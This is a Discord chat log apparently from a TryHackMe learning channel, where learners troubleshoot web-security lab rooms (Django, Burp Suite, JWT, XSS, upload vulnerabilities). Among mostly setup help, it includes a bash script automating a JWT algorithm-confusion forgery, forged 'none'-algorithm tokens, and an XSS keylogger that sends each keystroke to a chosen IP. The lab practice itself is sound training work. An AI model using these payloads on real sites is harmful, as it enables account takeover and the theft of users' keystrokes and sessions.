#web-fundamentals-path

Try using
"Sudo pip install -r req.txt"

Thanks @strange radish for replying.. but still can't make it work...

Gave +1 Rep to @strange radish

Try pip3

You are missing "-r"

@strange radish it's still giving error And while running the
. /Tclmap cmd it throws an error...

Install yaml

https://stackoverflow.com/questions/50868322/importerror-no-module-named-yaml

It's in the req.txt file tho
Don't know why it can't install from there

Is your system up to date?

I updated it a month ago...should I try updating it again...

Yeah
You should keep it up to date

OK sure and thanks so much for replying..

Gave +1 Rep to @strange radish

NP

Just update and tried this it worked..... Thanks it worked....

Thanks @strange radish, @flat canyon for your help... Really appreciate your help..

Gave +1 Rep to @strange radish

I cloned xsrfprobe and then (sudo python3 setup.py, sudo pip3 install xsrfprobe) but doing this still getting an error while running it..

Hey guys

In LFI

What is the last flag

That'd be cheating.
Ask for help, don't ask for the answers

@orchid hazel I cloned xsrfprobe and then (sudo python3 setup.py, sudo pip3 install xsrfprobe) but doing this still getting an error while running it..how can I fix it...

Please don't ping me to ask for help.
Everyone here is a volunteer and helps when they want to.
This doesn't sound like it's related to the web fundamentals path, as it's generic tooling.
Try #infosec-general

OK... Thanks..

I recently found you online so texted... I couldn't figure it.. The csrf tool so I thought I could get some help... So I pinged you... Sry

Ok broth excuse me

Today I'm Going to start Web Application fundamentals path of THM. As I'm beginner, I hope I will learn many things. Will update what I learnt.

thanks will do

Gave +1 Rep to @misty shadow

Good luck and have fun💙

Hello! Not sure where to ask this question, so hopefully I'm not violating any rules...
I'm trying to analyze some web traffic through Wireshark (HTTP/TLSv1.2) and I was wondering how would I decrypt the TLS packets since I'm trying to find details about a payment done, and I would assume payment details (price/billing address/email) would be encrypted.

@wheat arch this channel is for tryhackme's web fundamentals path

So where can I ask this if you don't mind?

#infosec-general but honestly decrypting HTTPS traffic is quite well documented

Fair enough, I'll dig around more. Thanks anyway

Did you set up you /etc/hosts file properly?

Hey just wanted to know if anyone else is stuck at JWT in the ZTH room?

I completed this yesterday. What are you stuck on?

Yeah thanks, I am by the first JWT challenge (Task 14) where you need to exploit the JWT with the public key. The problem is that once i do go through the steps for exploiting it manually I think the token expires, I'm not to sure.

Gave +1 Rep to @obtuse spire

Yes. You have to do it quickly. Get the first part of the jwt ready because its predefined. Just make sure its algo is HS256. Take the payload from the website. Then all you have to do is do the encryption portion which is the echo and python commands. Then slap that right there on the end.

It is time sensitive. Youll have to do it pretty fast.

time sensitivity my only weakness but ill try my best. thank you again.

i did have a feeling it was something like that

That happened to my burp suite last week. For some reason its only happened to the version that comes pre installed with kali. If it happens again you can install burp suite from their website. Havent had any issues with it.

In burp suite Intruder module Task 11 practical challenge. What is the flag? Super stuck, thanks

Nobody is just gonna give you the flag

How about you ask for help with whatever it is you're trying

explain what you have tried and the title of the question and more people could help

Does a newline matter for the end of a private key when copy and pasting it into a file to ssh into a remote device?

I think it does, yes.

@misty shadow I'll keep that in mind, Thank You!

Gave +1 Rep to @misty shadow

Hey guys, I'm having a go at web fundamentals and I'm having some issues in the Django room. Following the study guide every time I've created an app in task 3 and then tried to migrate the settings I get this error;

Ah, I still can't post screen shots, I'll copy and paste...

Nope cancel that it's too long to paste!🤦‍♂️

Hello! I have a question about the xss keylogger, could need a sanity check on my code. Anybody here willing to help me out? I just crash the server all the time....

!docs verify

Yeah I’ve tried like 3 times. The boy isn’t even responding.

Bot*

Oh weird

I’m wondering if it’s because my discord name is different to my THM handle..?

It shouldn't be

You sent it the token from your account right?

Yep. 3 x already 🤷🏻‍♂️

Huh

Weird

Just double checking, you did

!verify TOKEN

Right?

Hold on… right I might have made a mistake here then 😂
Go to the bot and type !verify

He responds

Then I put token?

No

!verify PLACE_TOKEN_HERE

Oh man. I’m just going to give up on hacking now, I can’t even get that right! 🤦🏻‍♂️

Haha. No worries. Happens to the best of us

If that dosent work then I've got nothing and you'll prolly need ti get in touch with a mod. But it should work

I’m sure I just messed it up.

Yep, I’m I’m now verified. I’ll get back with a screen shot when I next turn the laptop on. Thanks @rain violet

Gave +1 Rep to @rain violet

Np

hi guys i'm new here😀

do i have to take any module to begin the web fundamentals?

That's up to you and the knowledge you already have.

Ok

if you dont have a fundamental knowledge about programming etc, you can still start here but take it slow and make sure to dive into every rabbit hole when you dont understand something. No shame in taking days on solving a room when you learned the whole ins and outs

Thanks 🤙🏻

Gave +1 Rep to @tight yoke

a

hi all ¯_(ツ)_/¯

https://tryhackme.com/room/authenticate <-- the machine in this room isn't working

What is not working?

the machine gets started

but when i visit the url it doesn't work

i have started the vpn

What's the full url you visit?

long time ago

ok

https://IP

this is the full path

Then you should read the tasks more carefully.

see, i know that in place of ip

there will be ip address

https://10.10.78.76/

Yes, still you have to read more carefully. The task says: Connect on port 8888. So http://IP/ will be not enough to connect to it.

ok, i got it.

Why using John it through an error

it's likely that the hash file you gave to john does not contain hashes it recognizes

or maybe the hash type is not Raw-MD5 as you've written in the command

Says, No pass hash left to crack....

hmm, maybe john successfully cracked the hash?

try checking whether it got cracked by using the --show flag

Can you dm me a picture of what's in that hash.txt file?

It's likely that either it's not raw md5 or you have it formated in a way that John can't read it

I tried John after restart...

I just cracked it the same way you did in about 30 seconds.
To see the cracked password you need to use the --show option as well as the format you used to crack the password.
In this case you would need to do
john --show --format=Raw-MD5 hash1.txt

Yes bro got it...... Thanks

Gave +1 Rep to @rain violet

the command works, but i don't think you should show the answer to others

Please delete that message or spoiler tag it

You shouldn't just give the answer away to other people

Hey. I am stuck in the api bypass in https://tryhackme.com/room/zthweb2. I can't find the api endpoint with directory bruteforcing with feroxbuster -u http://10.10.214.35:82/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -x php -t 40 -o api_bypass_fuzz.log What am I missing here?

i have ran into a problem, actually i have python2 as well as python3 install but to tun tplmap i need to use python2 but whenever i use it, it says yaml error

when i try to install yaml, it says it is already installed but shows up the path of python3

whereas i need it in python2, any soln ?

Hi, it's my first time posting here. I am on the web fundamentals path, doing the xss room. For the task key logger, I was trying to use the post script provided in key logger as comment on stored xss page. Everytime i press submit it gives me unable to connect page, and i can't access the page. Has anyone come across this issue?

The JWT challenge isn't working for me

even i have changed the role to admin and alg to none

ended up with this base64 which looks good and should work ---> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjM2NjIzNjI5NTE3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjM2NjIzNjMwfQ.

but it isn't working

I also did the same the thing in the authentication room of this path and there it simply worked

You might want to include the room and task that you are doing

No no, thank u, the burp was creating issues

I closed burp and it worked.

Why is the sql map room not accessible...

Maybe it's removed or the owner put it on private

why does this keep happening with rooms that are important for the paths

Can someone make room for sqlmap to....

Is there a way to get into private room......

How to know if a website is using cloud computing... Or is it using s3 buckets...

Hello, any idea what is direct action API? And how can we secure such APIs?

Are there any way to confirm if cloudflare is being used as a CDN or as a web security layer?
Ex: Perhaps there are a unique header field when it's being used as a CDN?

i keep getting 'Load key "rd_isa": invalid format' when trying to ssh with id_rsa, could anyone help figure out what's wrong please? I copied the private key into id_rsa and changed the permission and am not sure what else to do

Open the file. Is the last line a blank line? If not, add a blank line at the bottem

thanks! it's blank, but still the same error :/. should first and last lines be on new lines too?

Gave +1 Rep to @rain violet

Can you dm me a acreenshot of it?

Can't figure out 2 ZTH room flags.

• Section 2 CSRF Automatic Exploitation
• Section 3.5 JWT Challenge (very similar to the Authenticaiton room)

For the CSRF it seems like some super simple answer that is in the walkthrough.

For JWT I tried replacing the header with the a None alg with a payload (tried both the original and an altered one with "role: admin" to no avail) and then refreshing the /private page.

There's too many @\Pardox's (creator of room) on Discord to know which to tag.

Either way, the real paradox isn't active

it ended up working this time around! i think i had some extra spaces or something, thanks for the help!

Gave +1 Rep to @rain violet

for "escalating privileges to root", my root flag is the same as the standard user flag. when i run whoami i do get root, so i think i managed to escalate. am i doing something wrong still?

oh nevermind, got it

Hi

hello guys, may someone kindly please help me in the subdomainenumeration task 6, i have failed to answer the question close to one and a half weeks

and look at burp suite sequencer go

I don't suppose a 308 Permanent Redirect is anything special when navigating a lab site, is it? Going through the burp suite units and getting familiar with things, I'm to navigate around and figure out which characters the site doesn't like. Found the flag already, but before that I ran into a 308 before a 500 with the / character... Realistically, could that be a vector or is that more of a sort of hiccup or different but proper response?

Why I'm asking in the first place is because of all the requests I've made prior were all 404 responses which is expected. They're handled and such, but then in my poking it gives me a new number so that made me go: "Yo... What?"

Certainly a good instinct

Hmm. Too inexperienced yet at least to be able to do anything with it regardless. Was just curious. Thanks.

Good. Stay curious. That mindset will get you far.

Will do! That parts hard wired into me unfortunately.

Hi

Welp, LFI's getting the best of me now. Task 2, 2nd to last question, I'm stuck.

Even with the hint, I can't figure out what it's wanting me to say.

Probably thinking about it wrong? I initially thought it'd be Shadow, but that's not correct.

Points to the directory in Hint and I can read the file I'm looking for that'd be in that directory, but none of that is the answer which is 6 characters long.

Okay, RTFM as always.

I'm good, figured it out.

BONK shadow did a stupid in trying to do the authenticate room

forgot to use burp for a task where burp was the best solution to the problem

Hmm. DOM XSS under Web Fundamentals, Task 5 is funky. I thought it would give you a flag if you actually did what the element wanted and gave it a link to display, then applied the exploit. The exploit works, just no flag.

Same with the color change, it looks like.

Dear Team, kindly assist pls, Working on Burp Suite, Task 11, Question 1 - I was asked to return to the Target Tap and find the API endpoint highlighted, but my Target Tap is empty as indicated below.

check proxy

and make sure your browser is configured to use the burp proxy to capture the traffic going through

@bright pond ⬆️

You have to surf (go to different pages) that page, in that way burp will make a 'map' of that page and you'll see all the available pages that burp found

Hi, I have problem in room Upload Vulnerabilities in task 11 - Challenge. I successfully upload my shell to server but every time on /admin page i get error "Module does not exist" after inserting command "../content/BQV.jpg". I've checked everyting... still no flag to end Web Fundamentals path... Please help ;'c

Check your DM so we don't flood this channel with the back and forth messages.

Make sure not to break Rule 1 of the discord. Get permission before sending direct messages.
No problem with helping people in this channel. That's the whole point.

Apologies and noted.

Question on Burp Suite: The Basics - TASK 13 - I am opening the chromium browser and typing the machine ip but when I am forwarding the button in Burp to release the traffic then the browser is showing "Error
Failed to connect to 10.10.4.58:80" why ??? and following this nothing under site map section

Getting this on both the embedded and firefox browsers

Is the port correct??? Because shadow thinks it is not port 80

What could be the port here ? In proxy listeners it is set 127.0.0.1:8080

I am using FoxyProxy and the it is set to Burp Suite for all URLs but manually Firefox proxy settings are not changed. Do I need to manually change it ?

If yes then why separately I need to change ?

Any help on this . Am I making a stupid mistake

oh uh well shadow is wrong the port should be 80

Do we need to open this in the (Burp Suite in the Attack box embedded browser ) or Firefox in the Attack Box. Am I doing a great doing a great mistake by trying to load the url in my personal Burp or firefox????

oh yeah you need to either use the attackbox or connect to the vpn to be able to open the link

Thanks and I worked on my own to find the stupid mistake that I was doing

Gave +1 Rep to @sweet python

Hello, I have a question on UPLOAD VULNERABILITIES TASK 9 - MAGIC NUMBER. So, I masked my php file into extension that is allowed from the website. However, the problem is I am not able to execute the file as php using curl or in-browser - the result is just a display of the texts written on .php file. Has anyone had the same problem as me? What did you do to RUN the file?

oh nvm, figured it out. In case you run into a problem, make sure to add 6 dummy texts not 4

for some reason im unable to connect to alot of labs in this path. Can't connect to the authenticate lab and the xss lab. Tried it in my own kali vm and the attackbox. Any idea what the issue could be? other paths work just fine.

with connect I mean going to the url

Anyone recommend any good javascript console hacking tutorials/rooms?

Like where you query the dev console to execute dangerous/vulneable JS

also looking for recommendations about web app rooms to practice burp and all the vulnerabilities

is there one to pentest wordpress/joomla etc ?

the owasp juice shop room is good for messing around with burp to an extent @static sparrow

👍

Hello, I have a question about django task 3. It says that I need to go to settings.py but there is no file by that name and the terminal does not recognize it as a command

Is there somewhere I should be looking for this file?

The answer is you need to look in the subdirectory of website. So ~/django/website/website. The settings.py file is in there

@wanton sorrel I dm’d @heavy portal yesterday about this room and the Task 3.

I got about halfway through it and then the results were not matching what the steps said.

My message to @heavy portal :

Task3.3
we have to add "include" in the import

Task3.4
Running $ python3 manage.py migrate didn’t work because the .urls file in the app directory didn’t exist.
At the next step, you create urls.py file missing at the previous step, but then the server throws an error because of the view

    path('', views.index, name='index'),
AttributeError: module 'articles.views' has no attribute 'index'```

Yeah, I got something like that

Yes, it’s possible with doing some research but the room looks a bit upside down, or I was too tired 🙂

I keep coming across lessons like this that make me walk away for the day

argh :/

I used to be really bummed about it, but I realized that there is no time limit on the process. I can learn at a slower pace and that is OK, although I do fear that I am not going to retain the info like I need to

Waiting on a reply, but if you have the time the first link from Task 4 looks good:
https://tutorial.djangogirls.org/en/

Thank you for the link

I am headed to bed, I will check it out tomorrow

Good night

night! 🙂

Starting my day over here

😄

For me it just makes Django look very "complex/messy", and I think the goal is the total opposite 😅
I also found some similarity with the syntax of Ruby on Rails.

Everything works assuming you have installed Django 2.2 (not the newest version). The .urls file is created upon project initialization and shouldn't be a problem.

Although, I have to admit I was not the greatest writer at the time of creating that room

Hey, I used this pip3 install Django==2.2.12 and had to install pip3

I’ll retry when I have some time, probably later tonight 🙂

I’m having issues with the ZTH Obscure Web Vulns room

I’m unable to run the python script

I installed it just fine using the pip3 install xsrfprobe

Not sure where to go from there, I navigated to python3.8/site-packages/xsrfprobe and tried making xsrfprobe.py executable using chmod but im still unable to run it

python/python3 xsrfprobe.py?????

I didn’t try doing python/ before python3 xsrfprobe.py I’ll try it

I tried python3 xsrfprobe.py but it Just tabbed to a new command line input, no error or anything but the script clearly didn’t run

Oh! Something worked

I had to navigate to .local/.bin

Would I need to do this everytime I want to run the xsrfprobe script?

not nescarily if you add it to the path

I am still having issues with task 3 Introduction to Django

I have followed the steps but it is returning with:

    path('', include('Articles.urls')),
NameError: name 'include' is not defined

I am following the instructions:

    path('Articles/, include('Articles.urls')),
    path('admin/', admin.site.urls),
     ```

You need to add under "from django.urls import path" "from django.conf.urls import include"

room: django
can't establish connection to the machine in task5
can connect to 10.10.10.10
can ssh into the machine

how do I proceed?

are you using the VPN with your own VM, or the attackbox?

my VM

I'm connected to the vpn for sure

sounds like you aren't poking at the right port.

ip:8000 says ssl error

added my ip in the hosts in settings.py

is this part of the ctf to not establish connection or should I open attackbox

ok found flag 2 and 3 inside the machine

but how do I access admin panel without a browser?

Could anyone shed some light as to why this JWT token works on authentication room
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.
eyJleHAiOjE1ODY2MjA5MjksImlhdCI6MTU4NjYyMDYyOSwibmJmIjoxNTg2NjIwNjI5LCJpZGVudGl0eSI6MH0K.
But this token will not?
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0.
eyJleHAiOjE1ODY2MjA5MjksImlhdCI6MTU4NjYyMDYyOSwibmJmIjoxNTg2NjIwNjI5LCJpZGVudGl0eSI6MH0.

When I encode the string comes back as the 2nd. The example in the room shows the 1st, with the K at the end.

The 0K at the end translates to the End of Line character in ASCII.

Base64 has a fixed length and if that length isn't met, padding characters are typically used (in base64, equals signs), so that's probably why it's screaming at you.

How are you encoding/decoding the payload?

Thank you i was wondering if it was character length.

Gave +1 Rep to @mossy scarab

cyberchef url friendly base64

Ah, I gotcha. The padding characters aren't always required because the length can typically be inferred by whatever is parsing the base64 encoded string, but the URL friendly conversion strips out the = signs, so I think that's what goofed it.

good old padding for data encoding

B64 does require padding to meet the fixed length. However, the JWT does not require that padding. It's a common sticking point on generating your own JWT tokens.

Not a conversion, different set of characters. There's regular, URL safe, and Unix Crypt encoding and all of them are b64
https://en.wikipedia.org/wiki/Base64#The_URL_applications

wow when you get tplmap working it is very nice to use to figure out SSTI

damn that jwt task took way to long to do...

@sweet python from obscure vulns? i had trouble with that one too lol, used a website (linked in the next jwt task) to complete it

yeah shadows main problem was not being quick enough

@sweet python I wrote a script for that :p

https://gist.github.com/sig00x/54ad6a3876fb5e2bda65bc0069db6401

shadow copied another person script line by line reading how it was done here is that script:

#!/bin/bash
# Update the IP to the IP of the vulnerable machine
ip=10.10.10.10
echo ""
echo "TryHackMe ZTH: Obscure Web Vulns JWT Challenge"
echo ""

echo "[+] downloading public key "
if [ -f public.pem ] ;then
 echo "[i] Removing old Public Key"
 rm public.pem
fi
wget --quiet http://$ip/public.pem &1>/dev/null

echo "[+] Obtaining JWT file from http://$ip"
curl -s http://$ip | grep -o ey.* >jwt

part1=$(cat jwt | cut -f1 -d".")
part2=$(cat jwt | cut -f2 -d".")
part3=$(cat jwt | cut -f3 -d".")

echo "[+] Changing Header from RS256 to HS256"

newpart1=$(echo $part1 | base64 -d | sed 's/RS256/HS256/g' | base64)

echo "[+] Converting public key to hex"

cat public.pem | xxd -p | tr -d "\\n" >public.xxd
publicxxd=$(cat public.xxd)

echo "[+] Signing the JWT with the valid HS256 key"

key=$(echo -n $newpart1.$part2 | openssl dgst -sha256 -mac HMAC -macopt hexkey:`cat public.xxd`| tr -d " " | cut -f2 -d "=")

echo "[+] Decode the hex to binary and reencoded the data"

secret=$(python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('"$key"')).replace('=','')\")")

echo ""
echo "---Manual Submission--"
echo $newpart1.$part2.$secret
echo "----------------------"
echo ""
final=$newpart1.$part2.$secret

echo "[+] Attempting submission via curl"

curl -s -X POST -F "jwt=$final" http://$ip/rs256.php | sed 's/<.*>//g'
# The sed 's/<.*>//g' at the last part of the curl command is to pull out all the HTML tags and display text.

oh this is highly tailored just for this challenge

yuup it is and that is fine

glad you solved it 🙂

yeah was a bit of a pain but got there in the end

and ZTH: obscure web vulns done

sits waiting patiently on a script for the ssrf task to complete

wow this takes a while

room: burp suite repeater
task: 7
I tried changing the request inside repeater multiple times but it didn't land me error 500 then I manually did the same request using a browser and it worked
so how do I get error 500 using repeater?

Well you basically just have to make the correct request. So not sure what request you used in your browser and which one in burp which gave you different results. You might want to show some screens of that.

finally did it

uuum anyone else have troubles with wfuzz in the ZTH: Web 2 room on task number 8

it outputs the following in the terminal when shadow try and run it after a while: Fatal exception: Pycurl error 52: Empty reply from server

starting to think it has something to do with the big.txt wordlist as the common.txt one worked fine without said error

Yes, check your python version

Going from 2 to 3 broke a lot of things. I forget what version that exercise requires

eh got it working with using the -Z flag

and not installing it through pip but the ubuntu apt packagemanager

🛠️ cool

What is the objective for Unit 5 ? I cant figure out what i'm supposed to o next.

I've fixed the isuue and retrieved the Admin Panel Flag. I just can't derived what the next two objectives are.

This is Introduction to Django's last task.

it is a capture the flag where you goal is to use what you learnt about django to hack the target machine and get 3 flags

There are literally 0 directions.

I interpreted the goal for the first flag. Retrieved it.

2nd and 3rd flags. I just cant figure it out?

yeah sadly that room is the only really badly made on in this path

look up a write up for it is shadows recommendation @hallow root

I actually have the same problem right now

For me I get a 404 error when my browser tries to retrieve .js, .svg and .css files. Any idea why this is the case? Is is part of fixing the django server or is it a bug? As the task is to fix the server I am not sure what is a bug and what is a feature (i.e. intended bug)

after reading the writeup I can tell without spoiler: if you run into problems with .js, .css, and .svg files, it is not part of the task to solve these and also not neccessary 😉

I just finished the complete beginner path, would you recommend going for this path first, or junior pentester?

your choice but shadow heavily enjoyed this one

Hi! Task 5 (Dom-Based XSS) from the Cross-site Scripting room here. I do not understand how the JS code from the website in this section can allow the example payload test" onmouseover="alert('Hover over the image and inspect the image')" to generate an alert when I hover over the picture. What's the purpose of the double quotes in the payload (") and how are we able to disregard (?) the single quote (') in the JS code?

Also for the same room, in the Keylogger task. I can't seem to adapt the work to make it work, for some reason if I plugged in a payload at https://github.com/chentetran/xss-keylogger/blob/master/keylogscript.html, uncommenting the code and add in the IP for both my currently hosting HTTP server or the IP of the actual website immediately brought down the XSS website. Anyone can share the keylogger code for this task? I use the example code given in the website but the keystrokes for some reason do not appear in the console

anyone here having trouble ssh'ing into the django ctf machine in intro to django room?

the connection either cuts in the middle of the session or it doesn't establish a connection completely and just hangs

where can i find help?

I just ssh'd into mine and it worked fine. maybe try restarting the machine

did u do it from the attack box or your machine ?

it doesn't work on my machine and attack box is a bit laggy for my internet speed

Do you have the target machine up right now ?

no but i can spin it up in a sec

Alright, ye do that. Meanwhile, you are on your own machine right? And is your own attacking machine a virtual machine or an installed operating system?

installed os

And it's some sort of linux ?

i got pop os

and already connected the ovpn

Okay, so doing ip a s to check if there is only a tun0 interface and not any extra like tun1, tun2 etc. should work ?

i got tun0 and tun1

both with same ip

Okay then do sudo killall openvpn and connect to the thm vpn again

Then wait a minute and check again to see if you now only got a tun0 interface

my own machine through openvpn

it worked

nice!

some wizardry right there

thanks

is it usually the problem because multiple interfaces are up?

So the ssh issue is gone, that's what you mean?

yes

what was the problem tho ?

Alright, well I saw it many times already, so just be aware to not connect to the thm vpn multiple times if you haven't disconnected previously

okay

thanks again

You are welcome

Hey @heavy portal coming back on the Django room, I finally took the time to start it over again. It fails at the exact same spot.
ModuleNotFoundError: No module named 'app.urls'
When you create an app in Django with the name (here: app) it doesn’t create the file .urls in that folder, or there is a command missing.

Having the same issue with this task.

Maybe I'm over simplifying here but the example payload gets inserted into the position of the 'imgURL' variable in the code you provided. So,

imgEl.innerHTML = '<img src="' + imgURL + '" alt="Image not found.." width=400>'

turns into:

imgEl.innerHTML = '<img src="test" onmouseover="alert('Hover over the image and inspect the image')" alt="Image not found.." width=400>'

For what it's worth, I think there is a double quote on the end of the hint that does not need to be there.

Oh I see, I thought that the ' ' is still retained after injecting the imgURL payload

Nope, you can actually see how the syntax comes out if you inspect the image element after you upload/update your payload.

I also had problems when following the instructions given by the tasks. I just used these instructions (https://docs.djangoproject.com/en/4.0/intro/tutorial01/) for configuring the app and the rest afterwards worked as described in the tasks, but I had to first finish all steps in the tutorial and then execute
python3 manage.py migrate'and
python3 manage.py runserver
Afterwards you can continue with the tasks as listed in the room

basically you can just run the commands from https://docs.djangoproject.com/en/4.0/intro/tutorial01/#creating-the-polls-app and
https://docs.djangoproject.com/en/4.0/intro/tutorial01/#write-your-first-view

hi all, i'm doing the xss room from and i'm stuck on the DOM-Based XSS. I'm supposed o edit the script to create an alert showing the page cookie. I've tried with the hint and write up and doesn't seem to be working. Not sure what I'm doing wrong. Any help with that?

Thank you @mighty wind

Gave +1 Rep to @mighty wind

did you get it to work?

never mind.. got it

I was trying to edit the source code instead of passing the parameters through the image URL input

Hello, I am working on the Windows Fundamental 2 Task 2 and am stuck on the question that asks Whom is the Windows license registered to? I have been stuck on this 1 question for a while and just can’t figure out who it is registered to. Can anyone help?

It's in one of the tools you get to via System Configuration.

Is it secure to pass access token in rest API response body?

When you only have a problem with the cookie, I assume you where able to create the onhover event on the picture via the input test" onmouseover="alert(1)
In that case you can retrieve from the previous tasks that you can get your cookie with document.cookie
Try to print your cookie using the alert the same way as in the previous tasks (I guess it was during stored XSS)

Hi everyone, has anyone else struggled with the XSS keylogger/any advice to point me in the right direction. I’ve tried posting the suggested script to the Stored page and then entering text in the XSS logger screen, but see nothing appearing in /logs. I’ve tested that I can post stuff as per the example manually to /log:text and this works. I’m wondering if I have missed a step? I’ve also tried setting up a ||local listener python webserver ||on my attackbox and adding a ||fetch|| with both my attackbox IP and the Room VM IP but neither approach seems to give me any result.

Which room is this for?

https://tryhackme.com/room/xss

Sorry, for more info it’s Task 7 specifically I’m having trouble with

for me the example somehow worked when I deleted the part type="text/javascript" and the comments. Don't ask me why. The output will be printed in the console of devtools so if you use firefox just press F12 and it should open and print stuff there as soon as you type on the stored XSS website after injecting the script.
If you wanna now what to adjust the line console.log(l) to, just ask again, but I did not want to spoiler for now 🙂

That sounds like the MIME type, and is a common client-side filter for files.

Hm... I tested it and so far it only executes when I remove the type. I actually had Zero experience with webdevelopment bevor TryHackMe so also no real idea why the webpage is bothered by the type and comments. If you know please tell me 🙂
To be exact:
If you do not remove the comments, the server will stop responding
If you don't remove the type then the script will just not execute or you don't get any output, either way you will not get what you need but at least the server doesn't die

https://tryhackme.com/room/uploadvulns
This room walks you through multiple types of client- and server-side filters and how to bypass them.

okay, I am not completely sure how it is related to the topic but I will have to do this room as part of the "Web Fundamentals" path so I will hopefully find out soon. Thanks for the teaser 🙂 👍

Yeah I had the server stopping issue as well with the comments, but worked that one out 👍

Hi @mighty wind , I think I tried this as well, but maybe missed something out so will try again and see where I get. I noticed that some other people had posted in #room-bugs that they had struggled with this task as well, and maybe something wrong with the VM 🤷‍♂️

I was able to make it work and sent you the code personally, so no one else is spoilered, because I am not sure if it is okay to post solutions here

Try not to post answers, flags etc but you can share solutions

You can use the discord spoiler feature

hiho! I'm doing Burp Suite Basics, and I can't progress on step 12: Scoping and Targeting. My Burp Suite isn't showing any IP in the Target > Site Map part. Did I miss something?
I have tried combinations of:

• 'show all' option
• using AttackBox
• using VM with Kali
• using Burp Suite browser
• using Firefox with Foxy Proxy enabled
• restarting

Did you navigate to the target machine IP in your browser while foxy proxy is enabled and burp is open ?

Yes, also tried using Burp Suite browser - same effects

Did the webpage even open when navigating there ?

Fixed. I was checking Site Map before forwarding the request. Had to forward it first, which I did after you asked if the website is even opening.

Thank you for your time!

thanks👍
Then the solution to execute a keylogger in the XSS room is the following (spoiler alert!):

||<script>
let x = "";
let ip = ""; // set here the machine_ip of the VM
 document.onkeypress = function (e) {
x += e.key;
new Image().src = "http://" + ip + "/log/" + x;
 }
</script>||

Thanks, but any clue why the original payload does not work? As in what is the reason that the keystrokes are not recorded to the console

Sadly not, but if you find out, I would like to know as well 🙂

Ok I am now at the room zthweb2 task 11 (last one) and have no clue how to get the flag. I have zero experience with PHP but tried fuzzing the parameter, payload of parameter, and page itself but no clues so far. Can someone please give me a hint what I have to look in to? >.<

Sometimes focusing too much on PHP is not great. Have you tried other methods of enumeration?

so far I did not try anything with numbers. I used wfuzz with /usr/share/wordlists/dirb/big.txt for fuzzing parameter, page, and payload. Other than that I sadly was not very creative yet

hiho!
I can't figure out what I am supposed to do in Burp Suite: Intruder task [Bonus Question -- Optional] Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise. From what I understood, column enumeration (column enumeration is getting names of all the columns, right?) in Repeater Extra Mile exercise is done simply by using group_concat(column_name) there. What am I supposed to use Intruder for in that task?

Not sure if this is helpful, but I figured out that you can manually adjust the SQL code to print the next column names but when trying to automate it I needed a feature which Burp did not seem to support, as far as I researched it (though that wasn't very much)

thank you for trying, but the thing is the task wants me to automate something that can be done with one (two, counting empty apostrophe request) requests

unless I don't understand something, which is why I am trying to seek for help 😛

Ok so far I also tested different code syntax. I haven't tried setting parameter in the request instead of the header because I am not sure how to. Other than that I intercepted the requests and responses to see what format they have. I also noticed that when I am forwarded to http://.../api.php?... from admin.php. the webaddress of /admin.php is in the request as referer. I used repeater to have that and tested several different inputs and syntax but none worked.
I did not get any output from api.php so far at all. I only have the empty html page.
I noticed that the page is in quirk mode and that it possibly uses the DOM api which gave me possible insight of how the source code is, but so far I was not able to make use out of that. Maybe because of my lack of understanding of web development and web programming languages in general.
Can someone please give me a hint 😕 Also just some background knowledge of things I may not know or have overseen would already be helpful 😄

Okay not sure if this is spoiling too much for you, but sometimes zooming in on fuzzing PHP would bear no fruit. Sometimes the flag can be accessed by directly accessing it with some URL path (i.e http:// .../flag.txt)

Honestly I had to look up online for the specific writeup for this as I have not seen any other way to derive this from the PHP on the website, may be it is hinted by the "ignore the admin.php" part?

thank you so much, I weren't thinking of that at all and I possibly would not have tested that in the future either. 😅 I have to work on my standard guessing/ enumerating skills 👍

I am trying to upload a PHP-backdoor webshell to a sever that has a file restriction in place, (will only except HTML files). So I have changed the file ext from .php to .html. It allows the file upload, but when you access the webshell within the website you can't interact with the execute command, as in ls for files. Is there any other way of doing this?

@rare relic will give it ago tomorrow, thank you.

Gave +1 Rep to @stuck frost

What do you do when you're set to test a web server and nmap finds 1000+ ports open? Is there a functional reason for this?

Well, if you're testing just the webserver I'd question why you're scanning ports. If you're testing the box as a whole, they might be actual open ports or it might be the firewall/some software trolling you.

how? i cant see the website but nmap shows there is the ip and port 8000 but the web browser cant come in or what ever

I don't exactly remember but I think the server took long to get ready but I'm not a sub

for subs it should load instantly

Any recommendations for a php web shell, that would work on Apache 2.4.29 PHP Version: 7.2.24?

For which room is this ?

Hello here, can someone advice with Introduction to Django - Unit 3 - Creating a website. I am following the article and when created new application and trying do a python3 manage.py migrate, I'm getting ModuleNotFoundError: No module named 'Articles.urls'. I've edited necessary files as per room tutorial, but still have an error, and googling leads to not very relevant issues. Thanks in advance ps. I have a screenshots, but can't paste them here or in #room-help.

if you want to give us the screenshots a good route would be to verify with the @reef vortex bot using the following info:

!docs verify

anyways dunno what is wrong and shadow would like to help.... isent it also providing a github link to a standard small django project that you can use???

thanks

hmmm

I think that rooms task is a little bit out of order, check this: #room-help message

great, thank you @misty shadow

Gave +1 Rep to @misty shadow

great catch there fontaene

Hi, I am in the Upload Vulnerabilities room. I have difficulties configuring my machine that runs Kali Linux on Vmware. I have gone through Task 1 directions, times & times over, with no success. I also tried using the THM AttackBox and editing the /etc/hosts configuration based on the directions, again, NO SUCCESS! Can anyone help me with this? Thanks.

By no success you mean what exactly ?

@misty shadow I can not connect to demo.uploadvulns.thm & when I use the machine's IP, it says I should follow task ! Direction before trying to connect.

demo.uploadvulns.thm is not an actual page of that machine, it's just for demo purpose in the task

@misty shadow So, I should use my target machine's IP? That tells me that I have not configured my machine correctly. it says I should follow task 1 Direction before trying to connect.

No, depending in which task you are, you use the host name that's mentioned in that task. So for task 4 it's telling you to navigate to that page:

@misty shadow OH! Thanks. I just saw it. Let me try it.

Gave +1 Rep to @misty shadow

